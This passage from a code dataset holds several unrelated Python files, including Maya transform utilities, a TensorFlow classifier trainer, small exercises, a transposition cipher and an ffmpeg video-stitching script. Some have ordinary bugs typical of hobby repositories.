setMatrixPos(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_=matrixList_(matrix_)\n\n if axis_ == 'x':\n data_[12] *= -1.0\n\n elif axis_ == 'y':\n data_[13] *= -1.0\n\n elif axis_ == 'z':\n data_[14] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n \ndef setMatrixRot_(matrix_, axis_):\n \"\"\"Get the FlipRotate from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_ = matrixList_(matrix_)\n if axis_ == 'x':\n data_[0] *= -1.0\n data_[1] *= -1.0\n data_[2] *= -1.0\n\n elif axis_ == 'y':\n data_[4] *= -1.0\n data_[5] *= -1.0\n data_[6] *= -1.0\n\n elif axis_ == 'z':\n data_[8] *= -1.0\n data_[9] *= -1.0\n data_[10] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef setMatrixFromList(list_):\n\n matrix_ = dt.Matrix()\n data_ = matrixList_(matrix_)\n data_[0] = list_[0]\n data_[1] = list_[1]\n data_[2] = list_[2]\n data_[4] = list_[3]\n data_[5] = list_[4]\n data_[6] = list_[5]\n data_[8] = list_[6]\n data_[9] = list_[7]\n data_[10] = list_[8]\n data_[12] = list_[9]\n data_[13] = list_[10]\n data_[14] = list_[11]\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef mirrorMatrix_(matrix_, axis_=None, type_=None):\n \"\"\"Get the mirror matrix from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): 'x', 'y', 'z'\n type_ (mirror type): 'flip', 'rot', 'pos'\n\n Returns:\n matrix : mirror matrix\n\n \"\"\"\n if 
type_ == 'flip':\n getMatrix_ = setMatrixAxis_(matrix_, axis_)\n if type_ == 'rot':\n getMatrix_ = setMatrixRot_(matrix_, axis_)\n if type_ == 'pos':\n getMatrix_ = setMatrixPos(matrix_, axis_)\n return getMatrix_\n\n\ndef mirror_(items, targets, axis='xy'):\n \"\"\"Mirror the transform by selecting the top item and top target\n\n Arguments:\n axis_ (axis): 'xy', 'xz', 'yx', 'yz', 'zx', 'zy'\n\n Returns:\n matrix : transform mirror\n\n \"\"\"\n if axis == 'xy':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'y'\n \n elif axis == 'xz':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'z'\n elif axis == 'yx':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'x'\n \n elif axis == 'yz':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'z'\n \n elif axis == 'zx':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'x'\n \n elif axis == 'zy':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'y'\n \n for i,item in enumerate(items): \n matrix_ = item.getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(matrix_, axis_=pAxis_, type_='flip')\n if i>0:\n PInvMatrix_ = getInverseTransform(targets[i].getParent())\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n localmatrix_ = targets[i].getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=rAxis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=r2Axis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n makeIdentity(targets[i], apply=1, t=0, r=1, s=1, n=0, pn=1)\n\ndef getLocalTrans(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n wm_ = item.getMatrix(worldSpace=True)\n targetParent_ = targets[i].getParent()\n wim_ = targetParent_.getMatrix(worldSpace=True).inverse()\n multM_ = wm_*wim_\n getLocalTrans_ = multM_[-1][:-1]\n return getLocalTrans_.get()\n\ndef getTransformLookingAt(pos, lookat, normal, axis=\"xy\", negate=False):\n \"\"\"Return a transformation mstrix using vector positions.\n Return the transformation matrix of the dagNode oriented looking to\n an specific point.\n Arguments:\n pos (vector): The position for the transformation\n lookat (vector): The aiming position to stablish the orientation\n normal (vector): The normal control the transformation roll.\n axis (str): The 2 axis used for lookat and normal. 
Default \"xy\"\n negate (bool): If true, invert the aiming direction.\n Returns:\n matrix: The transformation matrix\n >>> t = tra.getTransformLookingAt(self.guide.pos[\"heel\"],\n self.guide.apos[-4],\n self.normal,\n \"xz\",\n self.negate)\n \"\"\"\n normal.normalize()\n\n if negate:\n a = pos - lookat\n else:\n a = lookat - pos\n\n a.normalize()\n c = util.cross(a, normal)\n c.normalize()\n b = util.cross(c, a)\n b.normalize()\n\n if axis == \"xy\":\n X = a\n Y = b\n Z = c\n elif axis == \"xz\":\n X = a\n Z = b\n Y = -c\n elif axis == \"yx\":\n Y = a\n X = b\n Z = -c\n elif axis == \"yz\":\n Y = a\n Z = b\n X = c\n elif axis == \"zx\":\n Z = a\n X = b\n Y = c\n elif axis == \"z-x\":\n Z = a\n X = -b\n Y = -c\n elif axis == \"zy\":\n Z = a\n Y = b\n X = -c\n\n elif axis == \"x-y\":\n X = a\n Y = -b\n Z = -c\n elif axis == \"-xz\":\n X = -a\n Z = b\n Y = c\n elif axis == \"-xy\":\n X = -a\n Y = b\n Z = c\n\n m = dt.Matrix()\n m[0] = [X[0], X[1], X[2], 0.0]\n m[1] = [Y[0], Y[1], Y[2], 0.0]\n m[2] = [Z[0], Z[1], Z[2], 0.0]\n m[3] = [pos[0], pos[1], pos[2], 1.0]\n\n return m","repo_name":"smsyes/pythonWorkSpace","sub_path":"main/mApplication/ms_module/maya/python3/rigSupport/lib/_transform.py","file_name":"_transform.py","file_ext":"py","file_size_in_byte":9608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"42196857355","text":"import time\n\nimport tensorflow as tf\n\nfrom models.alexnet import AlexNet\nfrom models.vgg import VGG\nfrom models.googlenet import GoogLeNet\nfrom models.resnet import ResNet\nfrom models.inception_v2 import InceptionV2\nfrom models.inception_v3 import InceptionV3\nfrom trainers.predefined_loss import *\n\nclass ClfTrainer:\n def __init__(self, clf_model, clf_dataset):\n self.clf_model = clf_model\n self.clf_dataset = clf_dataset\n\n def __run_train__(self, sess, input, output,\n batch_i, batch_size,\n cost_func, train_op,\n scale_to_imagenet=False):\n\n total_loss = 0\n count = 0\n\n for batch_features, batch_labels in self.clf_dataset.get_training_batches_from_preprocessed(batch_i, batch_size, scale_to_imagenet):\n loss, _ = sess.run([cost_func, train_op],\n feed_dict={input: batch_features,\n output: batch_labels})\n total_loss = total_loss + loss\n count = count + 1\n\n return total_loss/count\n\n def __run_accuracy_in_valid_set__(self, sess, input, output, accuracy, batch_size, scale_to_imagenet=False):\n valid_features, valid_labels = self.clf_dataset.get_valid_set(scale_to_imagenet)\n\n valid_acc = 0\n for batch_valid_features, batch_valid_labels in self.clf_dataset.get_batches_from(valid_features, valid_labels, batch_size):\n valid_acc += sess.run(accuracy,\n feed_dict={input:batch_valid_features,\n output:batch_valid_labels})\n\n tmp_num = valid_features.shape[0]/batch_size\n return valid_acc/tmp_num\n\n def __train__(self, input, output,\n cost_func, train_op, accuracy,\n epochs, batch_size, save_model_path,\n save_every_epoch=1):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost_func, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. 
Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver = tf.train.Saver()\n saver.save(sess, save_model_path, global_step=epoch+1, write_meta_graph=False)\n\n def __get_simple_losses_and_accuracy__(self, out_layers, output, learning_rate, options=None):\n is_loss_weights_considered = False\n label_smoothings = [0 for i in range(len(out_layers))]\n\n if options is not None:\n if 'loss_weights' in options and \\\n len(options['loss_weights']) is len(out_layers):\n is_loss_weights_considered = True\n\n if 'label_smoothings' in options and \\\n len(options['label_smoothings']) is len(out_layers):\n label_smoothings = options['label_smoothings']\n\n aux_cost_sum = 0\n if is_loss_weights_considered:\n for i in range(len(out_layers) - 1):\n aux_out_layer = out_layers[i]\n aux_label_smoothing = label_smoothings[i]\n aux_cost = tf.losses.softmax_cross_entropy(output, aux_out_layer, label_smoothing=aux_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n aux_cost_sum += aux_cost * options['loss_weights'][i]\n\n final_out_layer = out_layers[len(out_layers)-1]\n final_label_smoothing = label_smoothings[len(out_layers)-1]\n cost = tf.losses.softmax_cross_entropy(output, final_out_layer, label_smoothing=final_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n\n if is_loss_weights_considered:\n cost = cost * options['loss_weights'][len(out_layers)-1]\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients = optimizer.compute_gradients(cost+aux_cost_sum)\n train_op = optimizer.apply_gradients(gradients)\n\n correct_pred = tf.equal(tf.argmax(final_out_layer, 1), tf.argmax(output, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n return cost, train_op, accuracy\n\n def __get_losses_and_accuracy__(self, model, output, out_layers, learning_rate, options=None):\n from_paper_flag = True\n\n if options is None or options['optimizer_from_paper'] is False:\n optimizer_from_paper_flag = False\n\n if isinstance(model, AlexNet):\n return get_alexnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, VGG):\n return get_vgg_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, GoogLeNet):\n return get_googlenet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.3, 0.3, 1.0]})\n elif isinstance(model, ResNet):\n return get_resnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, InceptionV2):\n return get_inceptionv2_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0]})\n elif isinstance(model, InceptionV3):\n return get_inceptionv3_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n 
self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0], 'label_smoothings': [0.1, 0.1]})\n else:\n return self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, options)\n\n # default to use AdamOptimizer w/ softmax_cross_entropy_with_logits_v2\n def run_training(self,\n epochs, batch_size, learning_rate,\n save_model_to, save_every_epoch=1,\n options=None):\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n self.__train__(input, output,\n cost, train_op, accuracy,\n epochs, batch_size,\n save_model_to, save_every_epoch)\n\n def resume_training_from_ckpt(self, epochs, batch_size, learning_rate, save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver1 = tf.train.Saver()\n saver1.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_transfer_learning(self,\n epochs, batch_size, learning_rate,\n save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n var_list = []\n for var in tf.model_variables():\n if 'final' not in var.name:\n var_list.append(var)\n\n saver = tf.train.Saver(var_list)\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. 
Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver2 = tf.train.Saver()\n saver2.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_testing(self,\n data, save_model_from, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, _ = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n final_out_layer = out_layers[len(out_layers)-1]\n softmax_result = tf.nn.softmax(final_out_layer)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n results = sess.run(softmax_result,\n feed_dict={input:data})\n\n return results\n","repo_name":"deep-diver/DeepModels","sub_path":"trainers/clftrainer.py","file_name":"clftrainer.py","file_ext":"py","file_size_in_byte":12924,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"} +{"seq_id":"3595623474","text":"car_running = False\nwhile True:\n mp = input(\">\")\n if mp.lower() == \"help\":\n print('''start - to start the car \nstop - to stop the car \nquit - to exit''')\n elif mp == \"start\":\n if not car_running:\n car_running = True\n print(\"Car started...Ready to go!\")\n else:\n print(\"Car's already started, what are you doing ?\")\n elif mp == \"stop\":\n if car_running:\n car_running = False\n print(\"car stopped.\")\n else:\n print(\"car was not running, cannot be stopped\")\n elif mp == \"quit\":\n print(\"thank you for using this products\")\n break\n else:\n # continue while loop\n print(\"I don't understand that...\")\n","repo_name":"redDevil1UR/helloworld","sub_path":"car_game.py","file_name":"car_game.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43590040634","text":"import utils\nfrom photfdtd import Ring, Grid, Solve\n\nif __name__ == \"__main__\":\n\n background_index = 1.0\n\n ring = Ring(\n outer_radius=100,\n zlength=20,\n x=150,\n y=150,\n z=13,\n width=20,\n length=0,\n gap=5,\n name=\"ring\",\n refractive_index=3.47,\n direction=1,\n background_index=background_index\n )\n\n grid = Grid(grid_xlength=300, grid_ylength=300, grid_zlength=25, grid_spacing=20e-9, total_time=1000,\n pml_width_x=50, pml_width_y=20, pml_width_z=1,\n permittivity=background_index ** 2, foldername=\"test_ring\")\n\n grid.set_source(\n source_type=\"planesource\",\n x=100,\n xlength=0,\n y=35,\n ylength=21,\n pulse_type=\"None\",\n z=13,\n zlength=22,\n period=1550e-9 / 299792458,\n )\n\n grid.set_detector(detector_type=\"blockdetector\",\n x=250,\n xlength=0,\n y=37,\n ylength=21,\n z=13,\n zlength=22,\n name=\"detector\")\n\n grid.add_object(ring)\n\n # 创建solve对象\n solve = Solve(grid=grid)\n\n solve._plot_(axis='z',\n index=13,\n filepath=grid.folder)\n\n grid.run()\n\n grid.save_simulation()\n\n grid.save_fig(axis=\"z\",\n axis_number=13)\n grid.save_fig(axis=\"x\",\n axis_number=150)\n\n data = 
Grid.read_simulation(folder=grid.folder)\n","repo_name":"phot-lab/photfdtd","sub_path":"examples/ring_ex.py","file_name":"ring_ex.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"17337429484","text":"from typing import Any, Callable, Pattern, Set, Type, Generator\nimport os\nfrom passlib.hash import pbkdf2_sha256\n\n\nclass BaseUtils:\n\n @classmethod\n def all_base_classes(cls, class_: Type) -> Set:\n base_class_set = set(class_.__bases__)\n all_base_class_set = {class_}\n all_base_class_set.update(base_class_set)\n for base in base_class_set:\n all_base_class_set.update(cls.all_base_classes(base))\n return all_base_class_set\n\n @classmethod\n def walk_all_parent_dirs(cls, path: str) -> Generator:\n \"\"\"\n Yield directories starting from the given directory up to the root\n \"\"\"\n if not os.path.exists(path):\n raise IOError(\"Starting path not found\")\n\n if os.path.isfile(path):\n path = os.path.dirname(path)\n\n last_dir = None\n current_dir = os.path.abspath(path)\n while last_dir != current_dir:\n yield current_dir\n parent_dir = os.path.abspath(os.path.join(current_dir, os.path.pardir))\n last_dir, current_dir = current_dir, parent_dir\n","repo_name":"mo1ein/feedbook","sub_path":"src/utils/base_utils.py","file_name":"base_utils.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25158168515","text":"import string\nimport math\n\ndef baris_maks(panjang_plaintext):\n pola1 = 1\n pola2 = 2 \n while (pola1 < panjang_plaintext):\n pola1 = pola1 + pola2\n return math.ceil(math.sqrt(pola1))\n\n\ndef enkripsi(barismaks, plaintext, kolom, baris):\n array = [['' for y in range(int(kolom))] for x in range(int(baris))]\n penghitung_string = 0\n hasil_enkripsi = ''\n dikunjungi = [False for x in range(kolom)]\n\n for i in range(int(baris)):\n kolom_mulai = baris - i - 1\n for j in range(int(kolom)):\n if (j >= kolom_mulai and j < kolom - kolom_mulai) and len(plaintext) >= penghitung_string: \n if penghitung_string >= len(plaintext):\n array[i][j] = 'x'\n else:\n array[i][j] = plaintext[penghitung_string]\n penghitung_string = penghitung_string + 1\n if penghitung_string == len(plaintext):\n break\n\n for i in range(int(baris)):\n for j in range(int(kolom)):\n if dikunjungi[j] == False:\n for k in range(int(baris)):\n if array[k][j] != '':\n hasil_enkripsi = hasil_enkripsi + array[k][j]\n dikunjungi[j] = True\n else:\n continue\n\n return hasil_enkripsi\n\nc\n\ndef main():\n plaintext = 'ikanhiumakantomat'\n panjang_plaintext = len(plaintext)\n barismaks = baris_maks(panjang_plaintext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(enkripsi(barismaks, plaintext, kolom, baris))\n\n ciphertext = \"tkxhaxkinxiautxnmoxamxaxx\"\n panjang_ciphertext = len(ciphertext)\n barismaks = baris_maks(panjang_ciphertext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(dekripsi(barismaks, ciphertext, kolom, baris))\n\nif __name__ == \"__main__\":\n main()","repo_name":"suriadivjr/uasPrakKripto","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37121531945","text":"import itertools\nimport functools\nimport re\nimport math\n\nfrom copy import deepcopy\n\nINPUT_FILE = 'input.txt'\n\ndef read_file(filename, func=None):\n result = []\n with 
open(filename, 'r') as f:\n for line in f:\n result.append(func(line.strip()) if func else line.strip())\n return result\n\ndef main1():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n for l in lines:\n inst, value = l.split(' ')\n value = int(value)\n if inst == \"forward\":\n position += value\n elif inst == \"down\":\n depth += value\n else:\n depth -= value\n print(position * depth)\n\ndef main2():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n aim = 0\n for l in lines:\n inst, value = l.split(' ')\n if inst == \"forward\":\n position += int(value)\n depth += aim * int(value)\n elif inst == \"down\":\n aim += int(value)\n else:\n aim -= int(value)\n print(depth * position)\n \nif __name__ == \"__main__\":\n main1()\n main2()\n","repo_name":"Universemul/AdventOfCode2021","sub_path":"python/day2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27413717564","text":"import os\nimport inspect\nimport click\nimport tempfile\nimport shutil\nimport subprocess\nimport logging\nimport time\n\nimport stitch_common as sc\n\nFILE_ENDING = 'mp4'\nMAX_ATTEMPTS = 3\nLOCAL_FFMPEG_PATH = 'ffmpeg/bin'\n\n\n@click.command()\n@click.argument('root_dir')\n@click.argument('base_out_dir')\n@click.option('--root_tmp_dir', default=None, help='Where tmp folders should be generated')\n@click.option('--rename_on_copy', default=True, is_flag=True)\n@click.option('--local_ffmpeg', default=True, is_flag=True)\ndef stitch_videos(root_dir, base_out_dir, root_tmp_dir, rename_on_copy, local_ffmpeg):\n if root_tmp_dir:\n logging.info('Setting directory where temp folders will be created: \"{}\".'.format(root_tmp_dir))\n os.environ['TMPDIR'] = root_tmp_dir\n\n if local_ffmpeg:\n ffmpeg_path = os.path.join(os.path.dirname(os.path.abspath(inspect.getsourcefile(lambda: 0))),\n LOCAL_FFMPEG_PATH)\n if not os.path.isdir(ffmpeg_path):\n logging.fatal('ffmpeg path is incorrect:'.format(ffmpeg_path))\n else:\n ffmpeg_path = 'ffmpeg'\n\n logging.info('Using ffmpeg: {}'.format(ffmpeg_path))\n\n logging.info('Starting the stitching process.')\n if rename_on_copy:\n logging.info('** Rename on copy mode enabled.')\n # We have a number of renaming strategies:\n # 1) if there is only a single directory that contains the files, assume it is a full trip + set code\n # 2) if there are two directories, assume the first is the trip code and the second the set code\n # 3) if there are three directories, follow assumption (2) and add a stereo L or R directory\n for trip_name in get_subdirs(root_dir):\n trip_path = os.path.join(root_dir, trip_name)\n join_mp4s(trip_path, base_out_dir, '{}.mp4'.format(trip_name), ffmpeg_path)\n for set_name in get_subdirs(trip_path):\n set_path = os.path.join(trip_path, set_name)\n join_mp4s(set_path, base_out_dir, '{}_{}.mp4'.format(trip_name, set_name), ffmpeg_path)\n for camera in get_subdirs(set_path):\n camera_path = os.path.join(set_path, camera)\n if camera.lower().startswith('l'):\n camera_abbrv = 'L'\n elif camera.lower().startswith('r'):\n camera_abbrv = 'R'\n else:\n logging.warning('Unexpected camera folder: {}'.format(camera_path))\n break\n join_mp4s(camera_path, base_out_dir, '{}_{}_{}.mp4'.format(trip_name, set_name, camera_abbrv),\n ffmpeg_path)\n else:\n for root, subdirs, files in os.walk(root_dir):\n directory = remove_prefix(root, root_dir)\n out_dir = base_out_dir + os.path.sep + directory\n out_file_name = 'joined.' 
+ FILE_ENDING\n if os.path.exists(out_file_name):\n logging.warning('***Skipping: \"{}\" already exists'.format(out_file_name))\n else:\n join_mp4s(root, out_dir, out_file_name, ffmpeg_path)\n\n\ndef join_mp4s(in_dir, out_dir, out_file_name, ffmpeg_path):\n files = get_files(in_dir)\n attempt_count = 0\n while attempt_count < MAX_ATTEMPTS:\n attempt_count += 1\n with tempfile.TemporaryDirectory() as tmpdir:\n logging.info('**** Processing folder: {}'.format(in_dir))\n mp4s = sorted([fi for fi in files if not fi.startswith('._')])\n file_text = ''\n # mp4s should be sorted alpha\n for vid in mp4s:\n logging.info('Copying video {}'.format(vid))\n shutil.copyfile(in_dir + os.path.sep + vid, tmpdir + os.path.sep + vid)\n if vid.lower().endswith('.mts'):\n logging.info('Processing mts videos')\n output_name = vid.rsplit('.', 1)\n output_file = output_name[0] + '.mp4'\n mts_to_mp4(tmpdir, ffmpeg_path, vid, output_file)\n file_text += \"file '{}/{}'\\n\".format(tmpdir, output_file)\n else:\n file_text += \"file '{}/{}'\\n\".format(tmpdir, vid)\n if len(mp4s) > 0:\n mp4_list_file = open('{}/mp4_list.txt'.format(tmpdir), 'w')\n mp4_list_file.write(file_text)\n mp4_list_file.close()\n\n concat_mp4s(tmpdir, ffmpeg_path)\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n if FILE_ENDING == 'avi':\n mp4_to_avi(tmpdir, ffmpeg_path)\n\n joined_file = tmpdir + os.path.sep + 'joined.' + FILE_ENDING\n if len(sc.get_video_details(joined_file, ffmpeg_path)) == 0:\n logging.error('Joined file is unreadable! Trying again in a minute.')\n time.sleep(60)\n else:\n logging.info('-----------------------------------------')\n # get fps values\n output_result = check_fps(tmpdir, ffmpeg_path, joined_file)\n split_array = output_result.split(\"/\")\n numerator = int(split_array[0])\n denominator = int(split_array[1])\n # do the math\n math = numerator / denominator\n\n if math > 30:\n downsample(tmpdir, ffmpeg_path, joined_file)\n ouput_file = tmpdir + os.path.sep + 'output.' 
+ FILE_ENDING\n logging.info('Copying {} to final location...'.format(ouput_file))\n shutil.copyfile(\n ouput_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('Copying {} to final location...'.format(joined_file))\n shutil.copyfile(\n joined_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('No mp4s found in folder.')\n attempt_count = MAX_ATTEMPTS\n if attempt_count >= MAX_ATTEMPTS:\n logging.error('Giving up after multiple retries trying to stitch {}'.format(in_dir))\n\n\ndef get_subdirs(folder):\n return [xx for xx in os.listdir(folder) if os.path.isdir(os.path.join(folder, xx))]\n\n\ndef get_files(folder):\n return [xx for xx in os.listdir(folder) if os.path.isfile(os.path.join(folder, xx))]\n\n\ndef concat_mp4s(tmpdir, ffmpeg_path):\n logging.info('Concatenating mp4s...')\n run_external_command(\n '{} -f concat -safe 0 -i mp4_list.txt -c copy joined.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef mp4_to_avi(tmpdir, ffmpeg_path):\n logging.info('Converting from mp4 to avi...')\n run_external_command(\n '{} -i joined.mp4 -vcodec copy -r 29.97 -an joined.avi'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n\n\ndef mts_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from mts to mp4...')\n run_external_command(\n '{} -i {} -vcodec mpeg4 -b:v 15M -acodec libmp3lame -b:a 192k {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'),\n input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef avi_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from avi to mp4...')\n run_external_command(\n '{} -i {} -c:v libx264 -c:a copy {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef downsample(tmpdir, ffmpeg_path, input_file):\n logging.info('Downsampling...')\n run_external_command(\n '{} -i {} -threads 0 -r 29.97 -y output.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef check_fps(tmpdir, ffmpeg_path, inputfile):\n logging.info('Checking fps...')\n # the shell command\n command = '{} -v error -select_streams v -of default=noprint_wrappers=1:nokey=1 -show_entries stream=r_frame_rate {}'.format(\n os.path.join(ffmpeg_path, 'ffprobe'), inputfile)\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=None, shell=True, cwd=tmpdir)\n # Launch the shell command:\n output, error = process.communicate()\n return output.decode(\"utf-8\")\n\n\ndef run_external_command(command, tmpdir):\n subprocess.call(\n command,\n shell=True,\n cwd=tmpdir\n )\n\n\ndef remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', level=logging.INFO)\n stitch_videos()\n","repo_name":"GlobalFinPrint/video_stitching","sub_path":"bulk_stitch.py","file_name":"bulk_stitch.py","file_ext":"py","file_size_in_byte":9351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16920183580","text":"import sys\nfrom PyQt5.QtWidgets import 